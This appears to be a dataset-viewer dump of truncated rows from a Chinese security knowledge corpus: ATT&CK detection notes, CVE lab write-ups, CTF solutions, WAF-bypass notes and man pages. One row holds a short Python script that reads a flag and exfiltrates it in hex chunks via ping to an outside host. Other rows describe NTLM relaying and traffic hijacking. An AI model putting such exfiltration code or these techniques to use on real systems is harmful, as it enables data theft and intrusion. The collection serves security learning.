text
stringlengths
100
9.93M
category
stringclasses
11 values
nethogs === 终端下的网络流量监控工具 ## 补充说明 有很多适用于Linux系统的开源网络监视工具。比如说,你可以用命令iftop来检查带宽使用情况。netstat用来查看接口统计报告,还有top监控系统当前运行进程。但是如果你想要找一个能够按进程实时统计网络带宽利用率的工具,那么NetHogs值得一看。 **NetHogs** 是一个开源的命令行工具(类似于Linux的top命令),用来按进程或程序实时统计网络带宽使用率。 来自NetHogs项目网站: > NetHogs是一个小型的net top工具,不像大多数工具那样拖慢每个协议或者是每个子网的速度而是按照进程进行带宽分组。NetHogs不需要依赖载入某个特殊的内...
sec-knowleage
.\" Copyright (c) 1991 The Regents of the University of California. .\" All rights reserved. .\" .\" Redistribution and use in source and binary forms, with or without .\" modification, are permitted provided that the following conditions .\" are met: .\" 1. Redistributions of source code must retain the above copyrigh...
sec-knowleage
# T1552-001-linux-文件中的凭据 ## 来自ATT&CK的描述 攻击者可能会在本地文件系统和远程文件共享中搜索包含不安全存储的凭据的文件。这些文件可以是用户创建的用于存储自己的凭据的文件,一组个人的共享凭据存储,包含系统或服务密码的配置文件或包含嵌入式密码的源代码/二进制文件。 可以通过OS Credential Dumping从备份或保存的虚拟机中提取密码。也可以从Windows域控制器上存储的组策略首选项中获取密码。 在云环境中,经过身份验证的用户凭据通常存储在本地配置和凭据文件中。在某些情况下,可以将这些文件复制并在另一台机器上重复使用,或者可以读取内容,然后将其用于身份验证,而无需复制任何文件。 ## 测试案...
sec-knowleage
# T1053-002-win-交互式AT计划任务 ## 来自ATT&CK的描述 诸如at和schtasks之类的实用程序可与Windows Task Scheduler一起使用来调度程序或脚本在某日期和时间执行。只要身份认证通过可以使用RPC,并且打开了文件和打印机共享功能,就可以在远程系统上调度任务。在远程系统上调度任务通常需要远程系统管理员群组的成员执行。 攻击者可能会通过任务调度在系统启动时或在计划的基础上执行程序以实现持久性,作为横向移动的一部分进行远程执行,获得系统权限,或者在指定账号的上下文下运行进程。 ## 测试案例 AT命令虽然自Win8系统起已经弃用,需要使用SCHTASKS命令了,但目前来看win7的使用范围还...
sec-knowleage
# MySQL <!-- GFM-TOC --> * [MySQL](#mysql) * [一、索引](#一索引) * [B+ Tree 原理](#b-tree-原理) * [MySQL 索引](#mysql-索引) * [索引优化](#索引优化) * [索引的优点](#索引的优点) * [索引的使用条件](#索引的使用条件) * [二、查询性能优化](#二查询性能优化) * [使用 Explain 进行分析](#使用-explain-进行分析) * [优化数据访问](#优化数据访问) * ...
sec-knowleage
#Carder (web, 150 points, solved by 119) The objective of this challange was to enter valid card numbers with known prefix and suffix. [This](https://en.wikipedia.org/wiki/Luhn_algorithm) wikipedia describes the method used to validate a card number A python script that does the job for us: ``` python import itertools ...
sec-knowleage
.\" Don't change the first line, it tells man that we need tbl. .\" This man page is Copyright (C) 1999 Andi Kleen . .\" 中文版版权所有 redcandle, Laser www.linuxforum.net 2000 .\" Permission is granted to distribute possibly modified copies .\" of this page provided the header is included verbatim, .\" and in case of nontriv...
sec-knowleage
# PNG ## 文件格式 对于一个 PNG 文件来说,其文件头总是由位固定的字节来描述的,剩余的部分由 3 个以上的 PNG 的数据块(Chunk)按照特定的顺序组成。 文件头 `89 50 4E 47 0D 0A 1A 0A` + 数据块 + 数据块 + 数据块…… ### 数据块CHUNk PNG 定义了两种类型的数据块,一种是称为关键数据块(critical chunk),这是标准的数据块,另一种叫做辅助数据块(ancillary chunks),这是可选的数据块。关键数据块定义了 4 个标准数据块,每个 PNG 文件都必须包含它们,PNG 读写软件也都必须要支持这些数据块。 | 数据块符号 | 数据块名称 ...
sec-knowleage
# Rocket Chat Pre-Auth Blind NoSQL Injection (CVE-2021-22911) [中文版本(Chinese version)](README.zh-cn.md) Rocket.chat is an open source team chat platform. At Rocket Chat from 3.12.1 to 3.13.2, The `getPasswordPolicy` method is vulnerable to NoSQL injection attacks and does not require authentication/authorization. It ...
sec-knowleage
##Responder with NTLM relay and Empire byt3bl33d3r针对本次介绍的这种攻击方式写过一个详细的指南。直通车[byt3bl33d3r](https://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.html) NetNTLMv2是微软的一种交换和响应协议。它使用了用户的哈希散列来进行服务器进行身份验证,并用中继散列来与服务器的交换数据。您只需将收集到的NetNTLMv2散列传递到一组主机,如果该主机的用户具有管理员的权限。那么...
sec-knowleage
--- title: 创建账号 --- ## 在阿里云上一键创建数据库账号 使用以下命令为 RDS 添加账号。 ```bash cf alibaba rds account ``` 默认会创建 crossfire 用户,且赋予所有权限,也可以使用 -u 指定其他用户名。 ### 查看已经创建的账号 加上 ls 查看已经创建的账号。 ```bash cf alibaba rds account ls ``` ### 删除所创建的账号 加上 del 删除已经创建的账号。 ```bash cf alibaba rds account del ``` <Vssue /> <script> export default { moun...
sec-knowleage
#include <cstdio> #include <complex> #include <vector> #include <unordered_map> #include <unordered_set> using namespace std; typedef complex<double> cd; unordered_map<size_t, cd> state, temp; void reduce(){ unordered_set<size_t> to_remove; for(auto p: state){ if(abs(p.second)<1e-9){ to_remove.insert(p.first...
sec-knowleage
# SqlServer 常用操作远程桌面语句 ### 1、是否开启远程桌面 * 1:表示关闭 * 0:表示开启 ```sql EXEC master..xp_regread 'HKEY_LOCAL_MACHINE', 'SYSTEM\CurrentControlSet\Control\Terminal Server', 'fDenyTSConnections' ``` ![](media/f01ea9712b6f116b14c9b9e75b7d49cd.jpg) ### 2、读取远程桌面端口 ```sql EXEC master..xp_regread 'HKEY_LOCAL_MACHINE', 'SYSTEM\CurrentCon...
sec-knowleage
flag = 'TWCTF{CENSORED}' # Public Parameters N = 362399735415589322157681543980275105429992954605987939918630439743175034051322587435808041019861957058380998750869560633571786010776847723240640963566840085732951866221169316038045394802601803695107549483549528439908919895169779788391589158353810104686541904340588255253...
sec-knowleage
version: '2' services: weblogic: image: vulhub/weblogic:10.3.6.0-2017 ports: - "7001:7001"
sec-knowleage
# T1190-CNVD-2017-02833-fastjson1.2.24远程代码执行 ## 来自ATT&CK的描述 使用软件,数据或命令来利用面向Internet的计算机系统或程序中的弱点,从而导致意外或无法预期的行为。系统的弱点可能是错误、故障或设计漏洞。这些应用程序通常是网站,但是可以包括数据库(例如SQL),标准服务(例如SMB 或SSH)以及具有Internet可访问开放的任何其他应用程序,例如Web服务器和相关服务。根据所利用的缺陷,这可能包括“利用防御防卫”。 如果应用程序托管在基于云的基础架构上,则对其进行利用可能会导致基础实际应用受到损害。这可以使攻击者获得访问云API或利用弱身份和访问管理策略的路径。 对于网站...
sec-knowleage
--- title: sslstrip categories: Information Gathering tags: [sslstrip, information gathering, kali linux] date: 2020-07-19 08:57:45 --- 介绍 ------ sslstrip是一种工具,可以透明地劫持网络上的HTTP流量,监视HTTPS链接和重定向,然后将这些链接映射到外观相似的HTTP链接或与同形图相似的HTTPS链接。它还支持提供图标的模式,这些图标看起来像是锁定图标、选择性日志记录和会话拒绝。 工具来源:https://github.com/moxie0/sslstrip [主页][1]...
sec-knowleage
# Deception > https://download.vulnhub.com/haclabs/Deception.ova 靶场IP:`192.168.32.19` 扫描对外端口服务 ``` ┌──(root㉿kali)-[~] └─# nmap -sV -p1-65535 192.168.32.19 Starting Nmap 7.92 ( https://nmap.org ) at 2022-09-13 21:52 EDT Nmap scan report for 192.168.32.19 Host is up (0.00010s latency). Not shown: 65533 closed tcp ports ...
sec-knowleage
# Level05 #### About Check the flag05 home directory. You are looking for weak directory permissions To do this level, log in as the level05 account with the password level05. Files for this level can be found in /home/flag05. #### Source code There is no source code available for this level #### Solutions ``` ls -al...
sec-knowleage
### freelist 劫持介绍 与用户态 glibc 中分配 fake chunk 后覆写 `__free_hook` 这样的手法类似,我们同样可以通过覆写 freelist 中的 next 指针的方式完成内核空间中任意地址上的对象分配,并修改内核当中一些有用的数据以完成提权(例如一些函数表等)。
sec-knowleage
## We lost the Fashion Flag! (Forensics, 100p) In Sharif CTF we have lots of task ready to use, so we stored their data about author or creation date and other related information in some files. But one of our staff used a method to store data efficiently and left the group some days ago. So if you want the flag fo...
sec-knowleage
原文 by [破-见](https://weibo.com/ttarticle/p/show?id=2309404007261092631700&sudaref=www.google.com.hk&display=0&retcode=6102) 绕过WAF的相关技术研究是WAF攻防研究非常重要的一部分,也是最有趣的部分,所以我在写WAF攻防时先写攻击部分。还是那句老话“不知攻焉知防”,如果连绕过WAF方法都不知道,怎么保证WAF能保护后端服务的安全。在我看来,WAF的绕过技术的研究将不断驱动防御水平提高。 以前一些WAF bypass的文章更像CASE的整理,都把焦点放在了规则对抗层面。绕过WAF规则,更像是正面对抗,属于下策。...
sec-knowleage
# Programming02, PPC In this challenge there is a hypothetical pinpad that looks like this: ``` 123 456 789 *0# ``` We have to count the number of unique passwords that: - end with `8`, `*` or `#` - every character is reachable from the previous one using a chess knight moves (for example, after `1` there can only be...
sec-knowleage
--- title: Shopify date: 2022-11-23 16:23:31.704478 background: bg-[#8bbb55] label: tags: - - categories: - Keyboard Shortcuts intro: | A visual cheat-sheet for the 50 keyboard shortcuts found on the Shopify website --- Keyboard Shortcuts ------------------ ### General Shortcuts Shortcut | Action --...
sec-knowleage
.\" Copyright (C) Markus Kuhn, 1996 .\" 中文版 Copyright (c) Bill Pan 和 www.LinuxForum.net .\" .\" This is free documentation; you can redistribute it and/or .\" modify it under the terms of the GNU General Public License as .\" published by the Free Software Foundation; either version 2 of .\" the License, or (at your op...
sec-knowleage
# A practical security guide for web developers (Work in progress) ### The intended audience Security issues happen for two reasons - 1. Developers who have just started and cannot really tell a difference between using MD5 or bcrypt. 2. Developers who know stuff but forget/ignore them. Our detailed explanations shoul...
sec-knowleage
# Drupal < 7.32 "Drupalgeddon" SQL Injection Vulnerability (CVE-2014-3704) [中文版本(Chinese version)](README.zh-cn.md) Drupal is a free and open-source web content management framework written in PHP and distributed under the GNU General Public License. The expandArguments function in the database abstraction API in Dr...
sec-knowleage
# Advertisement (web, 96 solved, 66p) ``` This platform is under protection. DO NOT hack it. ``` This was supposed to be a `sanity flag`, but it actually took us more time to get this one, than some `real` challenges. Fun part is that we noticed the `vulnerability` very fast, but we didn't realise it's the `attack vect...
sec-knowleage
# 0x00 简单and探索 首先都是来测试下 and的绕过 ``` and 不拦截 and 1 拦截 and a 不拦截 and 'a' 不拦截 and 'a' > < = 拦截 ``` 差不多知道他的规则了 绕过来就很简单了 ``` mysql> select 'a'-0; +-------+ | 'a'-0 | +-------+ | 0 | +-------+ 1 row in set, 1 warning (0.00 sec) mysql> select 'a'+1; +-------+ | 'a'+1 | +-------+ | 1 | +-------+ 1 row in set, 1 warni...
sec-knowleage
# m00nwalk2 Forensics, 300 points ## Description: > Revisit the last transmission. We think this transmission contains a hidden message. There are also some clues clue 1, clue 2, clue 3. ## Solution: This is a follow-up challenge to [m00nwalk](m00nwalk.md). We receive the same transmission as before, and three clues: ...
sec-knowleage
# 安装与使用 --- **下载安装包** 先下载安装 JDK,访问 oracle 官网下载 https://www.oracle.com/java/technologies/javase-downloads.html **设置环境变量** 安装完 JDK 后,需要设置一个 JAVA_HOME 的环境变量,它指向 JDK 的安装目录。在 Windows 下,它是安装目录,类似: ``` C:\Program Files\Java\jdk-14.0.1 ``` 新建 JAVA_HOME ``` C:\Program Files\Java\jdk-14.0.1(jdk目录路径) ``` 把 JAVA_HOME 的 bin 目录附加到系统...
sec-knowleage
### ElGamal概述 ElGamal算法的安全性是基于求解离散对数问题的困难性,于1984年提出,也是一种双钥密码体制,既可以用于加密又可用于数字签名。 如果我们假设p是至少是160位的十进制素数,**并且p-1有大素因子**,此外g是 $Z_p^*$ 的生成元,并且 $y \in Z_p^*$ 。那么如何找到一个唯一的整数x($0\leq x \leq p-2$) ,满足$g^x \equiv y \bmod p$ 在算法上是困难的,这里将x记为$x=log_gy$ 。 ### ElGamal密钥生成 基本步骤如下 1. 选取一个足够大的素数p,以便于在$Z_p$ 上求解离散对数问题是困难的。 2. 选取$Z_p^*$ ...
sec-knowleage
原文 by wooyun wiki ## 1.网络路径扫描 * 服务器IP段遍历目录 [DirBuster](https://www.owasp.org/index.php/Category:OWASP_DirBuster_Project) [OpenDoor](https://github.com/stanislav-web/OpenDoor) * 子域名定期收集 (Layer, [subDomainBrute.py](https://github.com/lijiejie/subDomainsBrute)) * 常见的子域名前缀 oa、zabbix、nagios、cacti、erp、sap、crm * 常见的管理后台路径关键字...
sec-knowleage
import subprocess, binascii s=subprocess.check_output("strace /read_flag", shell=True) h=binascii.hexlify(s[:16]) subprocess.check_output('ping -c 1 -p '+h+' 192.168.204.106', shell=True) h=binascii.hexlify(s[16:32]) subprocess.check_output('ping -c 1 -p '+h+' 192.168.204.106', shell=True) h=binascii.hexlify(s[32:48]) ...
sec-knowleage
--- title: RegEX date: 2020-11-25 18:28:43 background: bg-[#e56d2d] tags: - regular expression - regexp - pattern categories: - Toolkit intro: | A quick reference for regular expressions (regex), including symbols, ranges, grouping, assertions and some sample patterns to get you started. plugins: ...
sec-knowleage
## Matryoshka (Crackme, 50+100+300+500) This task was a crackme, which given correct password, spits out the next stage (base64-encoded). Let's start with the first one. ## Stage 1 Running the binary normally, we get the usage information: ``` $ ./stage1.bin Usage: ./stage1.bin <pass> $ ./stage1.bin test Try again... `...
sec-knowleage
# 申请内存块 ## __libc_malloc 一般我们会使用 malloc 函数来申请内存块,可是当仔细看 glibc 的源码实现时,其实并没有 malloc 函数。其实该函数真正调用的是 \_\_libc_malloc 函数。为什么不直接写个 malloc 函数呢,因为有时候我们可能需要不同的名称。此外,__libc_malloc 函数只是用来简单封装 _int_malloc 函数。\_int_malloc 才是申请内存块的核心。下面我们来仔细分析一下具体的实现。 该函数会首先检查是否有内存分配函数的钩子函数(__malloc_hook),这个主要用于用户自定义的堆分配函数,方便用户快速修改堆分配函数并进行测试。这里需要注意的...
sec-knowleage
package org.vulhub.fastjsondemo; import com.alibaba.fastjson.annotation.JSONField; public class User { @JSONField private String name; @JSONField private Integer age; public String getName() { return name; } public void setName(String name) { this.name = name; } ...
sec-knowleage
# 总体的思路 此篇整理一些黑灰产对抗时的一些总体的思路和方法。 ## 黑产网站分类 > 根据给出的域名和 *URL*,对网站域名进行黑产网站的分类,在提供的基础的黑产类别上,发现并识别更多种类的黑产网站 > > 基础黑产类别:涉赌、涉黄、涉毒、涉枪、涉诈、传销、接码平台、账号买卖、个人信息买卖、黑客相关、发卡平台、空包、卡池猫池、网赚、游戏私服、流量劫持、政府仿冒、假证买卖、支付平台、跑分平台、*IDC* 服务商、*CDN* 服务商等。[1] > ## 网站劫持判断 > 根据给出的域名和 *URL*,以及题目一得到的黑产分类,判断网站是自主行为还是被黑客劫持,劫持的话劫持的目标是哪里以及它的分类[1] ## 黑产网站关...
sec-knowleage
.TH EDQUOTA 8 "2001年3月9日星期五" .SH NAME(名称) edquota \- 编辑用户配额 .SH SYNOPSIS(总览) .B edquota [ .B \-p .I proto-username ] [ .B \-u | .B \-g ] .IR username .\|.\|. .LP .B edquota [ .B \-u | .B \-g ] .B \-t .SH DESCRIPTION(描述) .IX "edquota command" "" "\fLedquota\fP \(em edit user quotas" .IX edit "user quotas \(em \fLedq...
sec-knowleage
# Leetcode 题解 - 链表 <!-- GFM-TOC --> * [Leetcode 题解 - 链表](#leetcode-题解---链表) * [1. 找出两个链表的交点](#1-找出两个链表的交点) * [2. 链表反转](#2-链表反转) * [3. 归并两个有序的链表](#3-归并两个有序的链表) * [4. 从有序链表中删除重复节点](#4-从有序链表中删除重复节点) * [5. 删除链表的倒数第 n 个节点](#5-删除链表的倒数第-n-个节点) * [6. 交换链表中的相邻结点](#6-交换链表中的相邻结点) * [7. 链表求和](#7-链表求和) ...
sec-knowleage
--- title: Atom 编辑器 --- # Atom 编辑器 在 Web 开发领域,最受高手追捧的是三款编辑器:vim ,sublime ,atom 。Atom 的使用跟 sublime 类似,但是功能更强,所以主力编辑器选择 atom 。vim 太难学,不推荐作为主力编辑器,但是后面涉及服务器管理的时候,还是需要用到 vim 。 ### 安装 1. 深度系统上,到 atom.io 网站,下载 .deb 的包,进行安装。 2. 或者到深度商店搜索 atom 进行下载 ### 打开一个项目 在 Linux 上打开命令行命令 ``` Ctrl+Alt+T ``` ``` cd project/ atom . ``` ### 创建...
sec-knowleage
# Wordpress 4.6 Remote Code Execution Vulnerability (PwnScriptum) [中文版本(Chinese version)](README.zh-cn.md) ## Reference link https://exploitbox.io/vuln/WordPress-Exploit-4-6-RCE-CODE-EXEC-CVE-2016-10033.html ## Environment setup ``` docker compose build docker compose up -d ``` Because Mysql initialization needs ...
sec-knowleage
# 手动查找 IAT 并使用 ImportREC 重建 示例程序可以从此链接下载: [manually_fix_iat.zip](https://github.com/ctf-wiki/ctf-challenges/blob/master/reverse/unpack/example/manually_fix_iat.zip) 我们常用的`ImportREC`脱壳是使用的软件自带的`IAT auto search`, 但是如果我们要手动查找`IAT`的地址并`dump`出来, 又该怎么操作呢? 首先使用ESP定律, 可以很快地跳转到`OEP: 00401110`. 我们右键点击, 选择`查找->所有模块间的调用` 显示出调用的函数列...
sec-knowleage
# 信息泄漏 ## dmesg_restrict 考虑到内核日志中可能会有一些地址信息或者敏感信息,研究者提出需要对内核日志的访问进行限制。 该选项用于控制是否可以使用 `dmesg` 来查看内核日志。当 `dmesg_restrict` 为 0 时,没有任何限制;当该选项为 1 时,只有具有 `CAP_SYSLOG` 权限的用户才可以通过 `dmesg` 命令来查看内核日志。 ``` dmesg_restrict: This toggle indicates whether unprivileged users are prevented from using dmesg(8) to view messages from the ...
sec-knowleage
# 开源工具分析 此篇记录一些我在网络上发现的各种开源安全工具,学习其思路和设计。 ## 反钓鱼 ### Jeopardize:一款针对钓鱼域名的低功耗威胁情报&响应工具 参考:https://www.freebuf.com/sectool/231977.html 项目地址:https://github.com/utkusen/jeopardize #### 功能 - 生成域名组合:根据正常域名,从排版和同音字等因素,组合生成可能存在的钓鱼域名列表 - 探测已注册的域名:使用两种方式(whois查询、调用Zonefiles.io API查询)来查询已经被注册的钓鱼域名 - 分析域名: ## 沙盒相关 ### DangerZone:使...
sec-knowleage
--- title: 添加白名单 --- ## 在阿里云上为 RDS 添加白名单 使用以下命令为数据库添加白名单,`-w` 参数指定 CIDR 地址或者单个 IP 地址。 ```bash cf alibaba rds whiteList -w <ip> ``` ### 查看添加过的 RDS 白名单信息 加上 ls 列出之前添加过的白名单信息。 ```bash cf alibaba rds whiteList ls ``` ### 删除之前添加过的白名单信息 加上 del 删除之前添加过的白名单信息。 ```bash cf alibaba rds whiteList del ``` <Vssue /> <script> export...
sec-knowleage
# samba 配置案例 --- ## 案例 1 - 配置 smb 服务,共享目录为 `/smbshare` , - 共享名必须为 smbshare, - 只有本网段内的所有主机可以访问, - smbshare 必须是可以浏览的, - 用户 smb1 必须能够读取共享中的内容(用户名需要自己创建,密码为 smb123456); ``` yum -y install samba ``` ```vim vim /etc/samba/smb.conf [smbshare] path = /smbshare public = yes writeable=yes hosts allow = 192.168.xx. hosts den...
sec-knowleage
<?php include 'common.php'; if(isset($_POST['submit']) && isset($_FILES['image'])) { $fn = $_FILES['image']['tmp_name']; if(!is_uploaded_file($fn)) { fatal('uploaded file corrupted'); } $iminfo = getimagesize($fn); if(!$iminfo) { fatal('input was not an image'); } if($imin...
sec-knowleage
# S2-012 远程代码执行漏洞 影响版本: 2.1.0 - 2.3.13 漏洞详情: http://struts.apache.org/docs/s2-012.html ## 测试环境搭建 ``` docker compose build docker compose up -d ``` ## 原理 如果在配置 Action 中 Result 时使用了重定向类型,并且还使用 ${param_name} 作为重定向变量,例如: ```xml <package name="S2-012" extends="struts-default"> <action name="user" class="com.demo....
sec-knowleage
# Challenge 1 Let's inspect the contents of the IP we got in the intro level: ```console root@kali:/media/sf_CTFs/hoshen/1# curl 129.213.32.20 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv...
sec-knowleage
# Electron WebPreferences Remote Code Execution Vulnerability(CVE-2018-15685) [中文版本(Chinese version)](README.zh-cn.md) Electron is an open source library developed by GitHub for building cross-platform desktop applications with HTML, CSS, and JavaScript. Electron accomplishes this by combining Chromium and Node.js in...
sec-knowleage
### DUMP 及 IAT 重建原理 在找到程序OEP后, 我们需要将程序dump出来, 并重建`IAT`. `IAT`全名是`Import Address Table`, 表项指向函数实际地址. ### DUMP 及 IAT 重建示例 比如如下, 我们找到了OEP, 到达了程序的真正入口点. 我们这时就需要将程序dump出来. 我们右键, 选择`"用OllyDump脱壳调试进程"`(不过你也可以使用`LoadPE`来dump出来): 弹出一个窗口, 看一下地址是否正确, 主要就是看看`入口点地址`有没有选对. 然后取消勾选`重建输入表`. 将dump出的文件命名, 我这里是命名为`dump.exe`啦. 我们尝试来运行一下`du...
sec-knowleage
sendmail === 著名电子邮件服务器 ## 补充说明 **sendmail命令** 是一款著名的电子邮件传送代理程序,也就是平常说的电子邮件服务器,它基于标准的简单邮件传输协议(SMTP)。 ### 语法 ```shell sendmail(选项) ``` ### 选项 ```shell -bd:以守护进程方式运行指令; -bD:以前台运行方式运行; -bi:初始化别名数据库; -bm:以常规发送电子邮件; -bp:显示邮件的发送队列; -C:指定配置文件; -D:将调试的输出信息保存到日志文件,而不显示在标准输出设备上; -F:指定邮件发送者全名; -n:禁止使用邮件别名功能; -f:指定发件人的名字; -q:设置处理邮件...
sec-knowleage
# Protected area 1 (Web, 119p, 41 solved) In the challenge we get access to a webpage. In the source we can find a JS which uses some of the rest endpoints: ```js var file_check = function(file){ $.ajax({ url: '/check_perm/readable/', data: {'file': file} }).done(function(data){ if (data...
sec-knowleage
### 关于CheckRemoteDebuggerPresent概述 `kernel32`的`CheckRemoteDebuggerPresent()`函数用于检测指定进程是否正在被调试. `Remote`在单词里是指同一个机器中的不同进程. ``` c BOOL WINAPI CheckRemoteDebuggerPresent( _In_ HANDLE hProcess, _Inout_ PBOOL pbDebuggerPresent ); ``` 如果调试器存在(通常是检测自己是否正在被调试), 该函数会将`pbDebuggerPresent`指向的值设为`0xffffffff`. ### CheckRemot...
sec-knowleage
.\" DO NOT MODIFY THIS FILE! It was generated by help2man 1.48.5. .\"******************************************************************* .\" .\" This file was generated with po4a. Translate the source file. .\" .\"******************************************************************* .TH MD5SUM 1 2022年9月 "GNU coreutils 9...
sec-knowleage
# GhostScript 沙箱绕过(命令执行)漏洞(CVE-2018-16509) 8 月 21 号,Tavis Ormandy 通过公开邮件列表,再次指出 GhostScript 的安全沙箱可以被绕过,通过构造恶意的图片内容,将可以造成命令执行、文件读取、文件删除等漏洞: - http://seclists.org/oss-sec/2018/q3/142 - https://bugs.chromium.org/p/project-zero/issues/detail?id=1640 GhostScript 被许多图片处理库所使用,如 ImageMagick、Python PIL 等,默认情况下这些库会根据图片的内容将其...
sec-knowleage
.TH Dialog 3tk "tcllib - BWidget" .SH NAME .B Dialog - 有定制按钮的对话框 .SH 创建 CREATION .B Dialog pathName ?option value...? .SH 描述 DESCRIPTION Dialog 组件使用户能建立一个对话框。一些命令接受一个 index 参数来指示在哪个 Button 上工作。这个索引与 ButtonBox 命令由相同的规定: number 用数值来指定 Button,这里的 0 对应于第一个增加的 Button,1 对应下一个,以此类推。 endor 或 last 指示最后添加的项目。 default 指示缺省 But...
sec-knowleage
from [sub-domain-enum-checklist.md](https://gist.github.com/yamakira/2a36d3ae077558ac446e4a89143c69ab) ## Search engines - [Google](https://google.com) - **site:** operator - [Bing](https://bing.com) - **site:** operator ## DNS info aggregators - [VirusTotal](https://www.virustotal.com/) - [ViewDNS](https://viewdns....
sec-knowleage
### Note related sections 有时候生产厂商或者系统构建者可能需要使用一些特殊的信息来标记ELF文件,从而其它程序可以来检查该 ELF 文件的一致性以及兼容性。节区类型为 SHT_NOTE 或者程序头部类型为 PT_NOTE 的元素用于来实现这个目的,它们中对象的表项可能包含一到多个,每一个表项都是目标处理器格式的 4 字节数组。下面给出了一些可能的注释信息。但是这并不在 ELF 文件的规范内。 - namesz 与 name - name 的前 namesz 字节包含了一个以 NULL 结尾的字符串,这表示该项的拥有者或者发起人。但是目前并没有避免冲突的格式化的命名机制。一般来说,生产厂商会使...
sec-knowleage
# Adminer Server-side Request Forgery on Error Page of Elasticsearch and ClickHouse (CVE-2021-21311) [中文版本(Chinese version)](README.zh-cn.md) Adminer is a tool for managing content in databases developed by PHP. It natively supports MySQL, MariaDB, PostgreSQL, SQLite, MS SQL, Oracle, Elasticsearch and MongoDB. In ad...
sec-knowleage
# yara 实验 --- ## 免责声明 `本文档仅供学习和研究使用,请勿使用文中的技术源码用于非法用途,任何人造成的任何负面影响,与本人无关.` --- ## 什么是 yara YARA 是一款旨在帮助恶意软件研究人员识别和分类恶意软件样本的开源工具,使用 YARA 可以基于文本或二进制模式创建恶意软件家族描述信息,当然也可以是其他匹配信息。 这款工具配备一个短小精悍的命令行搜索引擎,它由纯C语言编写,优化了执行的效率。该引擎可以跨平台使用,能够运行 Windows,Linux 及Mac OS X 系统上。同时,这款工具提供 python 扩展,允许通过 python 脚本访问搜索引擎。 YARA 的功能非常丰富,尤其是与模块的...
sec-knowleage
# ADMIN UI 2 PWN-RE ## Description: > That first flag was a dud, but I think using a similar trick to get the full binary file might be needed here. There is a least one password in there somewhere. Maybe reversing this will give you access to the authenticated area, then you can turn up the heat… literally. ## Solutio...
sec-knowleage
--- title: Affinity Photo date: 2022-11-23 16:23:31.694998 background: bg-[#d578f0] label: tags: - - categories: - Keyboard Shortcuts intro: | A visual cheat-sheet for the 177 keyboard shortcuts found in Affinity Photo --- Keyboard Shortcuts ------------------ ### Editing {.row-span-2} Shortcut | Ac...
sec-knowleage
--- title: Aspect Ratio date: 2022-09-21 10:28:43 background: bg-emerald-600 tags: - photo - image - aspect - ratio - resolutions categories: - Other intro: | This cheat sheet lists some common aspect ratios and their pixel resolutions. Always confirm your final delivery ratio when shooting....
sec-knowleage
# CGI HTTPoxy漏洞(CVE-2016-5385) 根据RFC 3875规定,CGI(fastcgi)要将用户传入的所有HTTP头都加上`HTTP_`前缀放入环境变量中,而恰好大多数类库约定俗成会提取环境变量中的`HTTP_PROXY`值作为HTTP代理地址。于是,恶意用户通过提交`Proxy: http://evil.com`这样的HTTP头,将使用缺陷类库的网站的代理设置为`http://evil.com`,进而窃取数据包中可能存在的敏感信息。 PHP5.6.24版本修复了该漏洞,不会再将`Proxy`放入环境变量中。本环境使用PHP 5.6.23为例。 当然,该漏洞不止影响PHP,所有以CGI或Fastcgi运...
sec-knowleage
# T1190-可疑的SQL错误消息 ## ATT&CK描述 面向公众应用的利用指的是攻击者利用面向Internet的计算机系统或程序的弱点,使用软件、数据或命令来造成意外行为。系统弱点可能是缺陷、故障或设计漏洞。这些应用通常是网站,但也可以包括数据库(如SQL),标准服务(如SMB或SSH),以及任何带有可通过Internet访问的开放套接字的应用(如web服务器和相关服务)。面向公众应用的利用可能包括防御逃逸目的的利用,具体取决于被利用的弱点。 如果应用程序托管在云化基础架构上,则利用此应用可能会破坏底层实例。攻击者可能会利用此漏洞通过调用云API或利用弱身份和访问管理策略来实施攻击。 OWASP(开放式web应用程序安全项目)...
sec-knowleage
# Botpanel - Pwn (300 + 0), 17 solves > These cyber criminals are selling shells like hot cakes off thier new site. Pwn their botpanel for us so we can stop them In this task we were given a binary and `host:port` where it is running. Connecting there we get a banner and password prompt. After analyzing the binary, we ...
sec-knowleage
# Private Local Comment (ppc) In this PPC task we have 3 levels of Python challenges where we need to extract some data in unusual way. There is sandbox around all of the tasks so we can't spawn a shell or do anything like that, we need to use legit python code. ### Private Here we have code: ```python import sys from...
sec-knowleage
/* * Licensed to the Apache Software Foundation (ASF) under one * or more contributor license agreements. See the NOTICE file * distributed with this work for additional information * regarding copyright ownership. The ASF licenses this file * to you under the Apache License, Version 2.0 (the * "License"); you ...
sec-knowleage
# 算法 - 栈和队列 <!-- GFM-TOC --> * [算法 - 栈和队列](#算法---栈和队列) * [栈](#栈) * [1. 数组实现](#1-数组实现) * [2. 链表实现](#2-链表实现) * [队列](#队列) <!-- GFM-TOC --> ## 栈 ```java public interface MyStack<Item> extends Iterable<Item> { MyStack<Item> push(Item item); Item pop() throws Exception; boolean isEmpty(); ...
sec-knowleage
# Forensics 100 (forensics, 100p, ? solved) In the challenge we get a [pcap](ctf.pcap) to analyse. This time it's "only" 30 MB, so we include all of it. With some help from NetworkMiner and Wireshark we're able to find a TCP stream: ``` Knock Knock Who's there? Flag Seeker Go seek to a different place ``` We also find ...
sec-knowleage
require 'securerandom' require 'openssl' ROUNDS = 765 BITS = 128 PAIRS = 6 def encrypt(msg, key) enc = msg mask = (1 << BITS) - 1 ROUNDS.times do enc = (enc + key) & mask enc = enc ^ key end enc end def decrypt(msg, key) enc = msg mask = (1 << BITS) - 1 ROUNDS.times do...
sec-knowleage
# 算法 - 符号表 <!-- GFM-TOC --> * [算法 - 符号表](#算法---符号表) * [前言](#前言) * [初级实现](#初级实现) * [1. 链表实现无序符号表](#1-链表实现无序符号表) * [2. 二分查找实现有序符号表](#2-二分查找实现有序符号表) * [二叉查找树](#二叉查找树) * [1. get()](#1-get) * [2. put()](#2-put) * [3. 分析](#3-分析) * [4. floor()](#4-floor) * [5...
sec-knowleage
### 信息泄漏内容 在CTF中,Pwn题目一般都是运行在远端服务器上的。因此我们不能获知服务器上的libc.so地址、Heap基地址等地址信息,但是在进行利用的时候往往需要这些地址,此时就需要进行信息泄漏。 ### 信息泄漏目标 信息泄漏的目标有哪些?我们可以通过观察内存空间来获知这一点 ``` Start End Offset Perm Path 0x0000000000400000 0x0000000000401000 0x0000000000000000 r-x /home/pwn 0x0000000000600000 0x00000000006...
